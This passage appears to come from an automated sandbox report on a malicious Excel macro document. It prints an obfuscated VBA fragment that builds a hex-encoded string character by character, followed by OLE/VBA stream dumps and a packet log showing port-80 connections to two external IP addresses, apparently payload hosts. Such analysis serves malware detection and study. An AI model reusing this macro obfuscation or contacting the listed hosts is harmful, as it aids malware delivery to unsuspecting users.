PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "7"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "B"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "B"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "7"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "B"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNa

                                                Streams

                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 416
                                                General
                                                Stream Path:PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:416
                                                Entropy:5.27264099156
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { D 1 A 6 0 3 4 6 - B 1 2 9 - 4 A D 6 - B F 9 2 - 8 4 E F A 9 C 3 9 B 0 2 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 C 7 E 9 5 D 9 E D 9 3 F 1 9 3 F 1 9 3 F 1 9 3 F 1 " . . D P B = " 3 A 3 8 D 3 9 F 9 0 A 0 9 0 A 0 9 0 " . . G C = " F 8 F A 1 1 E 2 1 2 E 2 1 2
                                                Data Raw:49 44 3d 22 7b 44 31 41 36 30 33 34 36 2d 42 31 32 39 2d 34 41 44 36 2d 42 46 39 32 2d 38 34 45 46 41 39 43 33 39 42 30 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 62
                                                General
                                                Stream Path:PROJECTwm
                                                File Type:data
                                                Stream Size:62
                                                Entropy:3.05546715432
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2706
                                                General
                                                Stream Path:VBA/_VBA_PROJECT
                                                File Type:data
                                                Stream Size:2706
                                                Entropy:4.28368853699
                                                Base64 Encoded:False
                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2525
                                                General
                                                Stream Path:VBA/__SRP_0
                                                File Type:data
                                                Stream Size:2525
                                                Entropy:3.32361225004
                                                Base64 Encoded:False
                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ & . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . .
                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 283
                                                General
                                                Stream Path:VBA/__SRP_1
                                                File Type:data
                                                Stream Size:283
                                                Entropy:2.00632052806
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . C o d e K e y . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 76 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 11 00 00 00 00 00
                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 464
                                                General
                                                Stream Path:VBA/__SRP_2
                                                File Type:data
                                                Stream Size:464
                                                Entropy:1.56511880038
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 e1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                                                General
                                                Stream Path:VBA/__SRP_3
                                                File Type:data
                                                Stream Size:106
                                                Entropy:1.35911194617
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                Stream Path: VBA/__SRP_4, File Type: data, Stream Size: 24047
                                                General
                                                Stream Path:VBA/__SRP_4
                                                File Type:data
                                                Stream Size:24047
                                                Entropy:3.39608832578
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . A . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 30 01 00 00 00 00 00 00 00 00 00 00 02 00 02 00 18 00 00 00 91 0c 00 00 00 00 00 00 00 00 00 00 61 0a 00 00 00 00 00 00 00 00 00 00 81 0a 00 00 00 00 00 00 00 00
                                                Stream Path: VBA/__SRP_5, File Type: data, Stream Size: 244
                                                General
                                                Stream Path:VBA/__SRP_5
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.1201357217
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . X . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . P . P . P . . . . . . . b . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 04 00 00 00 03 60 00 00 d9 08 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: VBA/dir, File Type: data, Stream Size: 516
                                                General
                                                Stream Path:VBA/dir
                                                File Type:data
                                                Stream Size:516
                                                Entropy:6.28804288216
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . > . E b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                Data Raw:01 00 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 3e a4 45 62 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 22, 2021 15:36:08.971635103 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.110651970 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.110791922 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.113032103 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.564912081 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.669487953 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.678536892 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679099083 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679124117 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679167986 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679199934 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679248095 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.679289103 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.679636002 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679671049 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679711103 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679722071 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.679789066 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679801941 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679902077 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.183237076 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183279991 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183296919 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183442116 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.183556080 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183593988 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183631897 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183671951 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183696985 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.183707952 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183717012 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.184484959 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.184503078 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.184568882 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.737412930 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737456083 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737481117 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737505913 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737677097 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.737925053 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737955093 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737982988 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738013029 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738039970 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738065004 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738085032 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.738090038 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738117933 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738195896 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.953423977 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191302061 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191344976 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191370964 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191395044 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191490889 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191713095 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191742897 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191792011 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191792011 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191802979 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191814899 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191867113 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191889048 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192379951 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192411900 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192447901 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.192451954 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192481041 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192507982 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192537069 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.192548990 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.193031073 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193063021 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193094969 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193151951 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.193161011 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.193192959 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193219900 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193272114 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.675590992 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.675631046 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.675652981 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.675692081 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.873914957 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:14.192353964 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:18.690335035 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.741857052 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.741933107 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.743503094 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.794910908 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961242914 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961272001 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961287975 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961302996 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961322069 CET8049167172.67.176.78192.168.2.22
